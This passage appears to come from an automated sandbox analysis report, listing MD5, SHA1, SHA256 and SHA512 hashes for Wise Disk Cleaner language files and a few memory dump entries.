| SHA256 | 32f54c23c8760205d74885992cd8e11fd23911b44660078e1ee11e01af3f4106 |
| SHA512 | b932acbbd885fe68dc6ab31386bf3a9d6523ef7e3063c922cf77ac90ec147f7df1c087bcd067f8677abfb3b134f161035f7116c25ba544d93461e372f8e93a37 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Danish.ini
| MD5 | 3ca37cef05d366f1e10a49a6dde3225a |
| SHA1 | 2734b737b07ffdcdf7bd410b29e3030c94482dfe |
| SHA256 | 0714b1684aa7d1cab8978138754bcf712b43162e45e48c74aab1d588907d2a46 |
| SHA512 | e7d1aad57bb919f192427afe3558dc1c4467d82378b742a82da40ef430db5b8aa41aaec562bbc71ef36731d0800b113e1e38e861f9967904e07f6d4a64a01974 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Czech.ini
| MD5 | a1800a0b75aaf75089172dce6d9cbcba |
| SHA1 | 6eb1245d876ebfd253c77df807acfae0b6c72eed |
| SHA256 | 10d4accda03a1fb836d02eaab186054b49acb1630edd0a07c8d2653234266b1d |
| SHA512 | 6262cd53a2993d985e2c440a45a872a43cc9de8df380bbbf861df3748243c3768f85adf4db6e18ba148cd2d0ae3c6eb7d77f822c8015364d94114141d605a917 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Traditional).ini
| MD5 | 3b2fe60c4ace1c7733549c1e892622fa |
| SHA1 | 5903fa94e31186df51bf520add0542153c963a71 |
| SHA256 | c983c82379b6dc354f7dc4fb37e5ee147069c1141503df4a1efa22884969a69f |
| SHA512 | ebf3e1ef1354916d9cd3f4ba7f9c2a175e6b9d162e4380a69f551926c132079494b67ff3defaace968659dde396cb3e0a191c4bdea9ac6dde7349c563c1756ab |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Simplified).ini
| MD5 | ddb1e3858ba84d18e832bf926f71b8d3 |
| SHA1 | ff7af2ab8f8a9b21895e260055df79b10b1e3da2 |
| SHA256 | ac03ab706d80d0175939940091df58543eb885a5cc939e7dfa72a12dfe0a680e |
| SHA512 | b4b8da9b1b3b363e4e614a1ba52b926d785056011f2927febad29680df22225ded628141bff4b3bb9e9d11a77b88db5b44ef8955142ecb599f2891a09077fb23 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Catalan(Spain).ini
| MD5 | e06f62dcb6360c54d0c99e58f7108a1b |
| SHA1 | 60d47951f1cb0fff9abcccfdbd297337e5435130 |
| SHA256 | 7efcb6193c689aab517532b3a7dde3fbce7e42c6060fb698844458aaeae6656b |
| SHA512 | fa6d8726032afa24926e374d8496d73a61776cda53d735a980a87b1aaf2db160ec7a8243bf9e6c034d18218a2f1222d256f820c059c77647648456432682078e |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Bulgarian.ini
| MD5 | 8db61046f722c6feddf6e9ff36395cb1 |
| SHA1 | 32a99cfa048b1bdfa2a27d8618ebcbea98ef31ac |
| SHA256 | 65fedfe3cf7024a0345345e7973f67f0c6b8b0f548dcdca5c4f48c0b667d22e8 |
| SHA512 | a34408d86ad01faf8d7a5b651210943b4e8d5d3c4226eb4c082e5c7c346611015fa9139c3774d365df70d0d146a4a7c49fb1ff8ee04d668c3129d8c49a3bd207 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Latin).ini
| MD5 | 09acc2789101dbef07ab7e1c6be7ace6 |
| SHA1 | 7a55791699490fc7b23fb51fd1b5f0f322a05447 |
| SHA256 | 2007a5a9dbac09656e761b04448e53dd094ec30355f6394204158648d89131d4 |
| SHA512 | ad5071fb49485dc2a8a7d1ab2f7471b90d403b733bce3bf5cffdf017915cf89c719a0d63b6c22d7fe934dcb3713c8748e1f9fcaf6891feeb53ddc2d7c51998e5 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Cyrillic).ini
| MD5 | 538d04c6d3802d211d59fe34d24b08b2 |
| SHA1 | dd24233a739f0dc681b31d215006b407d4b10395 |
| SHA256 | fd915abe1e9c0deb8e103624eb5f0c4f29ad9506092214da36e4e9ea85add212 |
| SHA512 | 6f759975e4f4c95145ab862190428dbf7cf8ab8e5e32379cc44cb9c1f63c7c87e8263033dced3f55d2ef7e61212f22d3892907f823f1e9029dbc7a776de70e31 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Arabic.ini
| MD5 | 3e543da6bcc0ee84d53d88438fafc799 |
| SHA1 | c86b179b803d37852e73a6145c135431b4d52d74 |
| SHA256 | 586419de24beb7faee4a142ee0b5b78c35ff9b7ae4e4a7cc50fb1e2bf082f98c |
| SHA512 | 3a3cedfdbc40e9a2458f1117d08e034881c4ff8ed090bdb2f40f095ee53ec7a4d23dc83fd3ce1fea5939fe43cf31419fcbff799a88ef078e60dae9b6035d0640 |
memory/1932-187-0x0000000000000000-mapping.dmp
memory/544-229-0x0000000000000000-mapping.dmp
memory/1196-230-0x0000000000000000-mapping.dmp
memory/540-231-0x0000000000000000-mapping.dmp
memory/4584-232-0x0000000000000000-mapping.dmp